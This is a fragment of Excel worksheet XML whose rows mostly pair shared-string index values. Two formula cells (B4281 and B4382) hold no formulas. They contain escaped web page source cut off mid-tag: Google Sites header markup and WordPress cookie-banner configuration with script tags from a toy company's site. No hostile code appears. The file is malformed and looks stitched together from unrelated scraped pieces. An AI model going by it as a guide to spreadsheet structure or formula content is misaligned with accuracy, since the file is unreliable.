      <c r="A4245" t="s">
        <v>115</v>
      </c>
      <c r="B4245" t="s">
        <v>2979</v>
      </c>
    </row>
    <row r="4246" spans="1:2">
      <c r="A4246" t="s">
        <v>115</v>
      </c>
      <c r="B4246" t="s">
        <v>2980</v>
      </c>
    </row>
    <row r="4247" spans="1:2">
      <c r="A4247" t="s">
        <v>115</v>
      </c>
      <c r="B4247" t="s">
        <v>2981</v>
      </c>
    </row>
    <row r="4248" spans="1:2">
      <c r="A4248" t="s">
        <v>115</v>
      </c>
      <c r="B4248" t="s">
        <v>2982</v>
      </c>
    </row>
    <row r="4249" spans="1:2">
      <c r="A4249" t="s">
        <v>115</v>
      </c>
      <c r="B4249" t="s">
        <v>2983</v>
      </c>
    </row>
    <row r="4250" spans="1:2">
      <c r="A4250" t="s">
        <v>115</v>
      </c>
      <c r="B4250" t="s">
        <v>2984</v>
      </c>
    </row>
    <row r="4251" spans="1:2">
      <c r="A4251" t="s">
        <v>115</v>
      </c>
      <c r="B4251" t="s">
        <v>2985</v>
      </c>
    </row>
    <row r="4252" spans="1:2">
      <c r="A4252" t="s">
        <v>115</v>
      </c>
      <c r="B4252" t="s">
        <v>2986</v>
      </c>
    </row>
    <row r="4253" spans="1:2">
      <c r="A4253" t="s">
        <v>115</v>
      </c>
      <c r="B4253" t="s">
        <v>2987</v>
      </c>
    </row>
    <row r="4254" spans="1:2">
      <c r="A4254" t="s">
        <v>115</v>
      </c>
      <c r="B4254" t="s">
        <v>2988</v>
      </c>
    </row>
    <row r="4255" spans="1:2">
      <c r="A4255" t="s">
        <v>115</v>
      </c>
      <c r="B4255" t="s">
        <v>2989</v>
      </c>
    </row>
    <row r="4256" spans="1:2">
      <c r="A4256" t="s">
        <v>115</v>
      </c>
      <c r="B4256" t="s">
        <v>2990</v>
      </c>
    </row>
    <row r="4257" spans="1:2">
      <c r="A4257" t="s">
        <v>115</v>
      </c>
      <c r="B4257" t="s">
        <v>2991</v>
      </c>
    </row>
    <row r="4258" spans="1:2">
      <c r="A4258" t="s">
        <v>115</v>
      </c>
      <c r="B4258" t="s">
        <v>2992</v>
      </c>
    </row>
    <row r="4259" spans="1:2">
      <c r="A4259" t="s">
        <v>115</v>
      </c>
      <c r="B4259" t="s">
        <v>2993</v>
      </c>
    </row>
    <row r="4260" spans="1:2">
      <c r="A4260" t="s">
        <v>115</v>
      </c>
      <c r="B4260" t="s">
        <v>2994</v>
      </c>
    </row>
    <row r="4261" spans="1:2">
      <c r="A4261" t="s">
        <v>115</v>
      </c>
      <c r="B4261" t="s">
        <v>2995</v>
      </c>
    </row>
    <row r="4262" spans="1:2">
      <c r="A4262" t="s">
        <v>115</v>
      </c>
      <c r="B4262" t="s">
        <v>2996</v>
      </c>
    </row>
    <row r="4263" spans="1:2">
      <c r="A4263" t="s">
        <v>115</v>
      </c>
      <c r="B4263" t="s">
        <v>2997</v>
      </c>
    </row>
    <row r="4264" spans="1:2">
      <c r="A4264" t="s">
        <v>115</v>
      </c>
      <c r="B4264" t="s">
        <v>2998</v>
      </c>
    </row>
    <row r="4265" spans="1:2">
      <c r="A4265" t="s">
        <v>115</v>
      </c>
      <c r="B4265" t="s">
        <v>2999</v>
      </c>
    </row>
    <row r="4266" spans="1:2">
      <c r="A4266" t="s">
        <v>115</v>
      </c>
      <c r="B4266" t="s">
        <v>3000</v>
      </c>
    </row>
    <row r="4267" spans="1:2">
      <c r="A4267" t="s">
        <v>115</v>
      </c>
      <c r="B4267" t="s">
        <v>3001</v>
      </c>
    </row>
    <row r="4268" spans="1:2">
      <c r="A4268" t="s">
        <v>115</v>
      </c>
      <c r="B4268" t="s">
        <v>2729</v>
      </c>
    </row>
    <row r="4269" spans="1:2">
      <c r="A4269" t="s">
        <v>115</v>
      </c>
      <c r="B4269" t="s">
        <v>2730</v>
      </c>
    </row>
    <row r="4270" spans="1:2">
      <c r="A4270" t="s">
        <v>115</v>
      </c>
      <c r="B4270" t="s">
        <v>2731</v>
      </c>
    </row>
    <row r="4271" spans="1:2">
      <c r="A4271" t="s">
        <v>115</v>
      </c>
      <c r="B4271" t="s">
        <v>2732</v>
      </c>
    </row>
    <row r="4272" spans="1:2">
      <c r="A4272" t="s">
        <v>115</v>
      </c>
      <c r="B4272" t="s">
        <v>2733</v>
      </c>
    </row>
    <row r="4273" spans="1:2">
      <c r="A4273" t="s">
        <v>115</v>
      </c>
      <c r="B4273" t="s">
        <v>2734</v>
      </c>
    </row>
    <row r="4274" spans="1:2">
      <c r="A4274" t="s">
        <v>115</v>
      </c>
      <c r="B4274" t="s">
        <v>2735</v>
      </c>
    </row>
    <row r="4275" spans="1:2">
      <c r="A4275" t="s">
        <v>115</v>
      </c>
      <c r="B4275" t="s">
        <v>2736</v>
      </c>
    </row>
    <row r="4276" spans="1:2">
      <c r="A4276" t="s">
        <v>115</v>
      </c>
      <c r="B4276" t="s">
        <v>2737</v>
      </c>
    </row>
    <row r="4277" spans="1:2">
      <c r="A4277" t="s">
        <v>115</v>
      </c>
      <c r="B4277" t="s">
        <v>2738</v>
      </c>
    </row>
    <row r="4278" spans="1:2">
      <c r="A4278" t="s">
        <v>115</v>
      </c>
      <c r="B4278" t="s">
        <v>2739</v>
      </c>
    </row>
    <row r="4279" spans="1:2">
      <c r="A4279" t="s">
        <v>115</v>
      </c>
      <c r="B4279" t="s">
        <v>3002</v>
      </c>
    </row>
    <row r="4280" spans="1:2">
      <c r="A4280" t="s">
        <v>115</v>
      </c>
      <c r="B4280" t="s">
        <v>3003</v>
      </c>
    </row>
    <row r="4281" spans="1:2">
      <c r="A4281" t="s">
        <v>115</v>
      </c>
      <c r="B4281">
        <f> bgImgLoaded;
        globals.headerBgImgExists = true;
      } else {
        globals.headerBgImgExists = false;
      }
      &lt;/script&gt;&lt;/head&gt;&lt;body dir="ltr" itemscope itemtype="http://schema.org/WebPage" id="yDmH0d" css="yDmH0d"&gt;&lt;div jscontroller="pc62j" jsmodel="iTeaXe" jsaction="rcuQ6b:WYd;GvneHb:og1FDd;vbaUQc:uAM5ec;"&gt;&lt;div jscontroller="X4BaPc" jsaction="rcuQ6b:WYd;o6xM5b:Pg9eo;HuL2Hd:mHeCvf;VMhF5:FFYy5e;sk3Qmb:HI1Mdd;JIbuQc:rSzFEd(z2EeY),aSaF6e(ilzYPe);"&gt;&lt;div jscontroller="o1L5Wb" data-sitename="dekoaappshotwheelscollector" data-universe="1" jsmodel="fNFZH" jsaction="Pe9H6d:cZFEp;WMZaJ:VsGN3;hJluRd:UADL7b;zuqEgd:HI9w0;tr6QDd:Y8aXB;MxH79b:xDkBfb;JIbuQc:SPXMTb(uxAMZ);" jsname="G0jgYd"&gt;&lt;div jsname="gYwusb" class="p9b27"&gt;&lt;/div&gt;&lt;div jscontroller="RrXLpc" jsname="XeeWQc" role="banner" jsaction="keydown:uiKYid(OH0EC);rcuQ6b:WYd;zuqEgd:ufqpf;JIbuQc:XfTnxb(lfEfFf),AlTiYc(GeGHKb),AlTiYc(m1xNUe),zZlNMe(pZn8Oc);YqO5N:ELcyfe;"&gt;&lt;div jsname="bF1uUb" class="BuY5Fd" jsaction="click:xVuwSc;"&gt;&lt;/div&gt;&lt;div jsname="MVsrn" class="TbNlJb "&gt;&lt;div role="button" class="U26fgb mUbCce fKz7Od h3nfre M9Bg4d" jscontroller="VXdfxd" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend: yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow jsname="GeGHKb" aria-label="Back to site" aria-disabled="false" tabindex="0" data-tooltip="Back to site" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0"&gt;&lt;div class="VTBa7b MbhUzd" jsname="ksKsZd"&gt;&lt;/div&gt;&lt;span jsslot class="xjKiLb"&gt;&lt;span class="Ce1Y1c" style="top: -12px"&gt;&lt;svg class="V4YR2c" viewBox="0 0 24 24" focusable="false"&gt;&lt;path d="M0 0h24v24H0z" fill="none"/&gt;&lt;path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"/&gt;&lt;/svg&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="E2UJ5" jsname="M6JdT"&gt;&lt;div class="rFrNMe b7AJhc zKHdkd" jscontroller="pxq3x" jsaction="clickonly:KjsqPd; focus:Jt1EX; blur:fpfTEe; input:Lg5SV" jsshadow jsname="OH0EC" aria-expanded="true"&gt;&lt;div class="aCsJod oJeWuf"&gt;&lt;div class="aXBtI I0VJ4d Wic03c"&gt;&lt;span jsslot class="A37UZe qgcB3c iHd5yb"&gt;&lt;div role="button" class="U26fgb mUbCce fKz7Od i3PoXe M9Bg4d" jscontroller="VXdfxd" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend: yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow jsname="lfEfFf" aria-label="Search" aria-disabled="false" tabindex="0" data-tooltip="Search" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0"&gt;&lt;div class="VTBa7b MbhUzd" jsname="ksKsZd"&gt;&lt;/div&gt;&lt;span jsslot class="xjKiLb"&gt;&lt;span class="Ce1Y1c" style="top: -12px"&gt;&lt;svg class="vu8Pwe" viewBox="0 0 24 24" focusa</f>
        <v>0</v>
      </c>
    </row>
    <row r="4282" spans="1:2">
      <c r="A4282" t="s">
        <v>35</v>
      </c>
      <c r="B4282" t="s">
        <v>1182</v>
      </c>
    </row>
    <row r="4283" spans="1:2">
      <c r="A4283" t="s">
        <v>35</v>
      </c>
      <c r="B4283" t="s">
        <v>1183</v>
      </c>
    </row>
    <row r="4284" spans="1:2">
      <c r="A4284" t="s">
        <v>35</v>
      </c>
      <c r="B4284" t="s">
        <v>1184</v>
      </c>
    </row>
    <row r="4285" spans="1:2">
      <c r="A4285" t="s">
        <v>35</v>
      </c>
      <c r="B4285" t="s">
        <v>1185</v>
      </c>
    </row>
    <row r="4286" spans="1:2">
      <c r="A4286" t="s">
        <v>35</v>
      </c>
      <c r="B4286" t="s">
        <v>1186</v>
      </c>
    </row>
    <row r="4287" spans="1:2">
      <c r="A4287" t="s">
        <v>35</v>
      </c>
      <c r="B4287" t="s">
        <v>1187</v>
      </c>
    </row>
    <row r="4288" spans="1:2">
      <c r="A4288" t="s">
        <v>35</v>
      </c>
      <c r="B4288" t="s">
        <v>1188</v>
      </c>
    </row>
    <row r="4289" spans="1:2">
      <c r="A4289" t="s">
        <v>35</v>
      </c>
      <c r="B4289" t="s">
        <v>1189</v>
      </c>
    </row>
    <row r="4290" spans="1:2">
      <c r="A4290" t="s">
        <v>35</v>
      </c>
      <c r="B4290" t="s">
        <v>1190</v>
      </c>
    </row>
    <row r="4291" spans="1:2">
      <c r="A4291" t="s">
        <v>116</v>
      </c>
      <c r="B4291" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="4292" spans="1:2">
      <c r="A4292" t="s">
        <v>117</v>
      </c>
      <c r="B4292" t="s">
        <v>3004</v>
      </c>
    </row>
    <row r="4293" spans="1:2">
      <c r="A4293" t="s">
        <v>117</v>
      </c>
      <c r="B4293" t="s">
        <v>3005</v>
      </c>
    </row>
    <row r="4294" spans="1:2">
      <c r="A4294" t="s">
        <v>117</v>
      </c>
      <c r="B4294" t="s">
        <v>3006</v>
      </c>
    </row>
    <row r="4295" spans="1:2">
      <c r="A4295" t="s">
        <v>117</v>
      </c>
      <c r="B4295" t="s">
        <v>3007</v>
      </c>
    </row>
    <row r="4296" spans="1:2">
      <c r="A4296" t="s">
        <v>117</v>
      </c>
      <c r="B4296" t="s">
        <v>3008</v>
      </c>
    </row>
    <row r="4297" spans="1:2">
      <c r="A4297" t="s">
        <v>117</v>
      </c>
      <c r="B4297" t="s">
        <v>3009</v>
      </c>
    </row>
    <row r="4298" spans="1:2">
      <c r="A4298" t="s">
        <v>117</v>
      </c>
      <c r="B4298" t="s">
        <v>3010</v>
      </c>
    </row>
    <row r="4299" spans="1:2">
      <c r="A4299" t="s">
        <v>117</v>
      </c>
      <c r="B4299" t="s">
        <v>3011</v>
      </c>
    </row>
    <row r="4300" spans="1:2">
      <c r="A4300" t="s">
        <v>117</v>
      </c>
      <c r="B4300" t="s">
        <v>3012</v>
      </c>
    </row>
    <row r="4301" spans="1:2">
      <c r="A4301" t="s">
        <v>117</v>
      </c>
      <c r="B4301" t="s">
        <v>3013</v>
      </c>
    </row>
    <row r="4302" spans="1:2">
      <c r="A4302" t="s">
        <v>117</v>
      </c>
      <c r="B4302" t="s">
        <v>3014</v>
      </c>
    </row>
    <row r="4303" spans="1:2">
      <c r="A4303" t="s">
        <v>117</v>
      </c>
      <c r="B4303" t="s">
        <v>3015</v>
      </c>
    </row>
    <row r="4304" spans="1:2">
      <c r="A4304" t="s">
        <v>117</v>
      </c>
      <c r="B4304" t="s">
        <v>3016</v>
      </c>
    </row>
    <row r="4305" spans="1:2">
      <c r="A4305" t="s">
        <v>117</v>
      </c>
      <c r="B4305" t="s">
        <v>3017</v>
      </c>
    </row>
    <row r="4306" spans="1:2">
      <c r="A4306" t="s">
        <v>117</v>
      </c>
      <c r="B4306" t="s">
        <v>3018</v>
      </c>
    </row>
    <row r="4307" spans="1:2">
      <c r="A4307" t="s">
        <v>117</v>
      </c>
      <c r="B4307" t="s">
        <v>3019</v>
      </c>
    </row>
    <row r="4308" spans="1:2">
      <c r="A4308" t="s">
        <v>117</v>
      </c>
      <c r="B4308" t="s">
        <v>3020</v>
      </c>
    </row>
    <row r="4309" spans="1:2">
      <c r="A4309" t="s">
        <v>117</v>
      </c>
      <c r="B4309" t="s">
        <v>3021</v>
      </c>
    </row>
    <row r="4310" spans="1:2">
      <c r="A4310" t="s">
        <v>117</v>
      </c>
      <c r="B4310" t="s">
        <v>3022</v>
      </c>
    </row>
    <row r="4311" spans="1:2">
      <c r="A4311" t="s">
        <v>2</v>
      </c>
      <c r="B4311" t="s">
        <v>3023</v>
      </c>
    </row>
    <row r="4312" spans="1:2">
      <c r="A4312" t="s">
        <v>2</v>
      </c>
      <c r="B4312" t="s">
        <v>3024</v>
      </c>
    </row>
    <row r="4313" spans="1:2">
      <c r="A4313" t="s">
        <v>2</v>
      </c>
      <c r="B4313" t="s">
        <v>3025</v>
      </c>
    </row>
    <row r="4314" spans="1:2">
      <c r="A4314" t="s">
        <v>2</v>
      </c>
      <c r="B4314" t="s">
        <v>1948</v>
      </c>
    </row>
    <row r="4315" spans="1:2">
      <c r="A4315" t="s">
        <v>2</v>
      </c>
      <c r="B4315" t="s">
        <v>1949</v>
      </c>
    </row>
    <row r="4316" spans="1:2">
      <c r="A4316" t="s">
        <v>2</v>
      </c>
      <c r="B4316" t="s">
        <v>1950</v>
      </c>
    </row>
    <row r="4317" spans="1:2">
      <c r="A4317" t="s">
        <v>2</v>
      </c>
      <c r="B4317" t="s">
        <v>1951</v>
      </c>
    </row>
    <row r="4318" spans="1:2">
      <c r="A4318" t="s">
        <v>2</v>
      </c>
      <c r="B4318" t="s">
        <v>1952</v>
      </c>
    </row>
    <row r="4319" spans="1:2">
      <c r="A4319" t="s">
        <v>2</v>
      </c>
      <c r="B4319" t="s">
        <v>1953</v>
      </c>
    </row>
    <row r="4320" spans="1:2">
      <c r="A4320" t="s">
        <v>2</v>
      </c>
      <c r="B4320" t="s">
        <v>1954</v>
      </c>
    </row>
    <row r="4321" spans="1:2">
      <c r="A4321" t="s">
        <v>2</v>
      </c>
      <c r="B4321" t="s">
        <v>1955</v>
      </c>
    </row>
    <row r="4322" spans="1:2">
      <c r="A4322" t="s">
        <v>2</v>
      </c>
      <c r="B4322" t="s">
        <v>1956</v>
      </c>
    </row>
    <row r="4323" spans="1:2">
      <c r="A4323" t="s">
        <v>2</v>
      </c>
      <c r="B4323" t="s">
        <v>1957</v>
      </c>
    </row>
    <row r="4324" spans="1:2">
      <c r="A4324" t="s">
        <v>2</v>
      </c>
      <c r="B4324" t="s">
        <v>1958</v>
      </c>
    </row>
    <row r="4325" spans="1:2">
      <c r="A4325" t="s">
        <v>2</v>
      </c>
      <c r="B4325" t="s">
        <v>663</v>
      </c>
    </row>
    <row r="4326" spans="1:2">
      <c r="A4326" t="s">
        <v>2</v>
      </c>
      <c r="B4326" t="s">
        <v>664</v>
      </c>
    </row>
    <row r="4327" spans="1:2">
      <c r="A4327" t="s">
        <v>2</v>
      </c>
      <c r="B4327" t="s">
        <v>665</v>
      </c>
    </row>
    <row r="4328" spans="1:2">
      <c r="A4328" t="s">
        <v>2</v>
      </c>
      <c r="B4328" t="s">
        <v>666</v>
      </c>
    </row>
    <row r="4329" spans="1:2">
      <c r="A4329" t="s">
        <v>2</v>
      </c>
      <c r="B4329" t="s">
        <v>1959</v>
      </c>
    </row>
    <row r="4330" spans="1:2">
      <c r="A4330" t="s">
        <v>2</v>
      </c>
      <c r="B4330" t="s">
        <v>1960</v>
      </c>
    </row>
    <row r="4331" spans="1:2">
      <c r="A4331" t="s">
        <v>2</v>
      </c>
      <c r="B4331" t="s">
        <v>1961</v>
      </c>
    </row>
    <row r="4332" spans="1:2">
      <c r="A4332" t="s">
        <v>2</v>
      </c>
      <c r="B4332" t="s">
        <v>1962</v>
      </c>
    </row>
    <row r="4333" spans="1:2">
      <c r="A4333" t="s">
        <v>2</v>
      </c>
      <c r="B4333" t="s">
        <v>1963</v>
      </c>
    </row>
    <row r="4334" spans="1:2">
      <c r="A4334" t="s">
        <v>2</v>
      </c>
      <c r="B4334" t="s">
        <v>3026</v>
      </c>
    </row>
    <row r="4335" spans="1:2">
      <c r="A4335" t="s">
        <v>2</v>
      </c>
      <c r="B4335" t="s">
        <v>3027</v>
      </c>
    </row>
    <row r="4336" spans="1:2">
      <c r="A4336" t="s">
        <v>2</v>
      </c>
      <c r="B4336" t="s">
        <v>3028</v>
      </c>
    </row>
    <row r="4337" spans="1:2">
      <c r="A4337" t="s">
        <v>2</v>
      </c>
      <c r="B4337" t="s">
        <v>3029</v>
      </c>
    </row>
    <row r="4338" spans="1:2">
      <c r="A4338" t="s">
        <v>2</v>
      </c>
      <c r="B4338" t="s">
        <v>3030</v>
      </c>
    </row>
    <row r="4339" spans="1:2">
      <c r="A4339" t="s">
        <v>74</v>
      </c>
      <c r="B4339" t="s">
        <v>1938</v>
      </c>
    </row>
    <row r="4340" spans="1:2">
      <c r="A4340" t="s">
        <v>74</v>
      </c>
      <c r="B4340" t="s">
        <v>1939</v>
      </c>
    </row>
    <row r="4341" spans="1:2">
      <c r="A4341" t="s">
        <v>74</v>
      </c>
      <c r="B4341" t="s">
        <v>1940</v>
      </c>
    </row>
    <row r="4342" spans="1:2">
      <c r="A4342" t="s">
        <v>74</v>
      </c>
      <c r="B4342" t="s">
        <v>1941</v>
      </c>
    </row>
    <row r="4343" spans="1:2">
      <c r="A4343" t="s">
        <v>74</v>
      </c>
      <c r="B4343" t="s">
        <v>1942</v>
      </c>
    </row>
    <row r="4344" spans="1:2">
      <c r="A4344" t="s">
        <v>74</v>
      </c>
      <c r="B4344" t="s">
        <v>1943</v>
      </c>
    </row>
    <row r="4345" spans="1:2">
      <c r="A4345" t="s">
        <v>74</v>
      </c>
      <c r="B4345" t="s">
        <v>1944</v>
      </c>
    </row>
    <row r="4346" spans="1:2">
      <c r="A4346" t="s">
        <v>74</v>
      </c>
      <c r="B4346" t="s">
        <v>1945</v>
      </c>
    </row>
    <row r="4347" spans="1:2">
      <c r="A4347" t="s">
        <v>74</v>
      </c>
      <c r="B4347" t="s">
        <v>1946</v>
      </c>
    </row>
    <row r="4348" spans="1:2">
      <c r="A4348" t="s">
        <v>74</v>
      </c>
      <c r="B4348" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="4349" spans="1:2">
      <c r="A4349" t="s">
        <v>74</v>
      </c>
      <c r="B4349" t="s">
        <v>1948</v>
      </c>
    </row>
    <row r="4350" spans="1:2">
      <c r="A4350" t="s">
        <v>74</v>
      </c>
      <c r="B4350" t="s">
        <v>1949</v>
      </c>
    </row>
    <row r="4351" spans="1:2">
      <c r="A4351" t="s">
        <v>74</v>
      </c>
      <c r="B4351" t="s">
        <v>1950</v>
      </c>
    </row>
    <row r="4352" spans="1:2">
      <c r="A4352" t="s">
        <v>74</v>
      </c>
      <c r="B4352" t="s">
        <v>1951</v>
      </c>
    </row>
    <row r="4353" spans="1:2">
      <c r="A4353" t="s">
        <v>74</v>
      </c>
      <c r="B4353" t="s">
        <v>1952</v>
      </c>
    </row>
    <row r="4354" spans="1:2">
      <c r="A4354" t="s">
        <v>74</v>
      </c>
      <c r="B4354" t="s">
        <v>1953</v>
      </c>
    </row>
    <row r="4355" spans="1:2">
      <c r="A4355" t="s">
        <v>74</v>
      </c>
      <c r="B4355" t="s">
        <v>1954</v>
      </c>
    </row>
    <row r="4356" spans="1:2">
      <c r="A4356" t="s">
        <v>74</v>
      </c>
      <c r="B4356" t="s">
        <v>1955</v>
      </c>
    </row>
    <row r="4357" spans="1:2">
      <c r="A4357" t="s">
        <v>74</v>
      </c>
      <c r="B4357" t="s">
        <v>1956</v>
      </c>
    </row>
    <row r="4358" spans="1:2">
      <c r="A4358" t="s">
        <v>74</v>
      </c>
      <c r="B4358" t="s">
        <v>1957</v>
      </c>
    </row>
    <row r="4359" spans="1:2">
      <c r="A4359" t="s">
        <v>74</v>
      </c>
      <c r="B4359" t="s">
        <v>1958</v>
      </c>
    </row>
    <row r="4360" spans="1:2">
      <c r="A4360" t="s">
        <v>74</v>
      </c>
      <c r="B4360" t="s">
        <v>663</v>
      </c>
    </row>
    <row r="4361" spans="1:2">
      <c r="A4361" t="s">
        <v>74</v>
      </c>
      <c r="B4361" t="s">
        <v>664</v>
      </c>
    </row>
    <row r="4362" spans="1:2">
      <c r="A4362" t="s">
        <v>74</v>
      </c>
      <c r="B4362" t="s">
        <v>665</v>
      </c>
    </row>
    <row r="4363" spans="1:2">
      <c r="A4363" t="s">
        <v>74</v>
      </c>
      <c r="B4363" t="s">
        <v>666</v>
      </c>
    </row>
    <row r="4364" spans="1:2">
      <c r="A4364" t="s">
        <v>74</v>
      </c>
      <c r="B4364" t="s">
        <v>1959</v>
      </c>
    </row>
    <row r="4365" spans="1:2">
      <c r="A4365" t="s">
        <v>74</v>
      </c>
      <c r="B4365" t="s">
        <v>1960</v>
      </c>
    </row>
    <row r="4366" spans="1:2">
      <c r="A4366" t="s">
        <v>74</v>
      </c>
      <c r="B4366" t="s">
        <v>1961</v>
      </c>
    </row>
    <row r="4367" spans="1:2">
      <c r="A4367" t="s">
        <v>74</v>
      </c>
      <c r="B4367" t="s">
        <v>1962</v>
      </c>
    </row>
    <row r="4368" spans="1:2">
      <c r="A4368" t="s">
        <v>74</v>
      </c>
      <c r="B4368" t="s">
        <v>1963</v>
      </c>
    </row>
    <row r="4369" spans="1:2">
      <c r="A4369" t="s">
        <v>74</v>
      </c>
      <c r="B4369" t="s">
        <v>1964</v>
      </c>
    </row>
    <row r="4370" spans="1:2">
      <c r="A4370" t="s">
        <v>74</v>
      </c>
      <c r="B4370" t="s">
        <v>1965</v>
      </c>
    </row>
    <row r="4371" spans="1:2">
      <c r="A4371" t="s">
        <v>74</v>
      </c>
      <c r="B4371" t="s">
        <v>1966</v>
      </c>
    </row>
    <row r="4372" spans="1:2">
      <c r="A4372" t="s">
        <v>74</v>
      </c>
      <c r="B4372" t="s">
        <v>1967</v>
      </c>
    </row>
    <row r="4373" spans="1:2">
      <c r="A4373" t="s">
        <v>74</v>
      </c>
      <c r="B4373" t="s">
        <v>1968</v>
      </c>
    </row>
    <row r="4374" spans="1:2">
      <c r="A4374" t="s">
        <v>74</v>
      </c>
      <c r="B4374" t="s">
        <v>1969</v>
      </c>
    </row>
    <row r="4375" spans="1:2">
      <c r="A4375" t="s">
        <v>74</v>
      </c>
      <c r="B4375" t="s">
        <v>1970</v>
      </c>
    </row>
    <row r="4376" spans="1:2">
      <c r="A4376" t="s">
        <v>74</v>
      </c>
      <c r="B4376" t="s">
        <v>1971</v>
      </c>
    </row>
    <row r="4377" spans="1:2">
      <c r="A4377" t="s">
        <v>74</v>
      </c>
      <c r="B4377" t="s">
        <v>1972</v>
      </c>
    </row>
    <row r="4378" spans="1:2">
      <c r="A4378" t="s">
        <v>74</v>
      </c>
      <c r="B4378" t="s">
        <v>1973</v>
      </c>
    </row>
    <row r="4379" spans="1:2">
      <c r="A4379" t="s">
        <v>74</v>
      </c>
      <c r="B4379" t="s">
        <v>1974</v>
      </c>
    </row>
    <row r="4380" spans="1:2">
      <c r="A4380" t="s">
        <v>74</v>
      </c>
      <c r="B4380" t="s">
        <v>1975</v>
      </c>
    </row>
    <row r="4381" spans="1:2">
      <c r="A4381" t="s">
        <v>74</v>
      </c>
      <c r="B4381" t="s">
        <v>1976</v>
      </c>
    </row>
    <row r="4382" spans="1:2">
      <c r="A4382" t="s">
        <v>74</v>
      </c>
      <c r="B4382">
        <f> {"nn_cookie_ids":[],"cookielist":[],"non_necessary_cookies":[],"ccpaEnabled":"","ccpaRegionBased":"","ccpaBarEnabled":"","strictlyEnabled":["necessary","obligatoire"],"ccpaType":"gdpr","js_blocking":"1","custom_integration":"","triggerDomRefresh":"","secure_cookies":""};
var cli_cookiebar_settings = {"animate_speed_hide":"500","animate_speed_show":"500","background":"#4c4c4c","border":"#b1a6a6c2","border_on":"","button_1_button_colour":"#00a47c","button_1_button_hover":"#008363","button_1_link_colour":"#fff","button_1_as_button":"1","button_1_new_win":"","button_2_button_colour":"#333","button_2_button_hover":"#292929","button_2_link_colour":"#444","button_2_as_button":"","button_2_hidebar":"","button_3_button_colour":"#dedfe0","button_3_button_hover":"#b2b2b3","button_3_link_colour":"#333333","button_3_as_button":"1","button_3_new_win":"","button_4_button_colour":"#fffcfc","button_4_button_hover":"#cccaca","button_4_link_colour":"#333333","button_4_as_button":"1","button_7_button_colour":"#00a47c","button_7_button_hover":"#008363","button_7_link_colour":"#fff","button_7_as_button":"1","button_7_new_win":"","font_family":"inherit","header_fix":"","notify_animate_hide":"1","notify_animate_show":"","notify_div_id":"#cookie-law-info-bar","notify_position_horizontal":"right","notify_position_vertical":"bottom","scroll_close":"","scroll_close_reload":"","accept_close_reload":"","reject_close_reload":"","showagain_tab":"","showagain_background":"#fff","showagain_border":"#000","showagain_div_id":"#cookie-law-info-again","showagain_x_position":"100px","text":"#ffffff","show_once_yn":"","show_once":"10000","logging_on":"","as_popup":"","popup_overlay":"1","bar_heading_text":"","cookie_bar_as":"banner","popup_showagain_position":"bottom-right","widget_position":"left"};
var log_object = {"ajax_url":"https:\/\/storytoys.com\/wp-admin\/admin-ajax.php"};
/* ]]&gt; */ &lt;/script&gt; &lt;script type='text/javascript' src='https://storytoys.com/wp-content/uploads/siteground-optimizer-assets/cookie-law-info.min.js?ver=2.0.4' id='cookie-law-info-js'&gt;&lt;/script&gt; &lt;script type='text/javascript' src='https://storytoys.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.3.2' id='tp-tools-js'&gt;&lt;/script&gt; &lt;script type='text/javascript' src='https://storytoys.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.3.2' id='revmin-js'&gt;&lt;/script&gt;&lt;link rel="https://api.w.org/" href="https://storytoys.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://storytoys.com/wp-json/wp/v2/pages/1875" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://storytoys.com/xmlrpc.php?rsd" /&gt;&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://storytoys.com/wp-includes/wlwmanifest.xml" /&gt;&lt;meta name="generator" content="WordPress 6.2" /&gt;&lt;link rel='shortlink' href='https://storytoys.com/?p=1875' /&gt;&lt;link rel="alternate" type="application/json+oembed" href="https://storytoys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fstorytoys.com%2Fprivacy%2F" /&gt;&lt;link rel="alternate" type="text/xml+oembed" href="https://storytoys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fstorytoys.com%2Fprivacy%2F&amp;#038;format=xml" /&gt;&lt;meta</f>
        <v>0</v>
      </c>
    </row>
    <row r="4383" spans="1:2">
      <c r="A4383" t="s">
        <v>74</v>
      </c>
      <c r="B4383" t="s">
        <v>1977</v>
      </c>
    </row>
    <row r="4384" spans="1:2">
      <c r="A4384" t="s">
        <v>74</v>
      </c>
      <c r="B4384" t="s">
        <v>1978</v>
      </c>
    </row>
    <row r="4385" spans="1:2">
      <c r="A4385" t="s">
        <v>74</v>
      </c>
      <c r="B4385" t="s">
        <v>1979</v>
      </c>
    </row>
    <row r="4386" spans="1:2">
      <c r="A4386" t="s">
        <v>74</v>
      </c>
      <c r="B4386" t="s">
        <v>1980</v>
      </c>
    </row>
    <row r="4387" spans="1:2">
      <c r="A4387" t="s">
        <v>74</v>
      </c>
      <c r="B4387" t="s">
        <v>1981</v>
      </c>
    </row>
    <row r="4388" spans="1:2">
      <c r="A4388" t="s">
        <v>74</v>
      </c>
      <c r="B4388" t="s">
        <v>1982</v>
      </c>
    </row>
    <row r="4389" spans="1:2">
      <c r="A4389" t="s">
        <v>74</v>
      </c>
      <c r="B4389" t="s">
        <v>1983</v>
      </c>
    </row>
    <row r="4390" spans="1:2">
      <c r="A4390" t="s">
        <v>74</v>
      </c>
      <c r="B4390" t="s">
        <v>1984</v>
      </c>
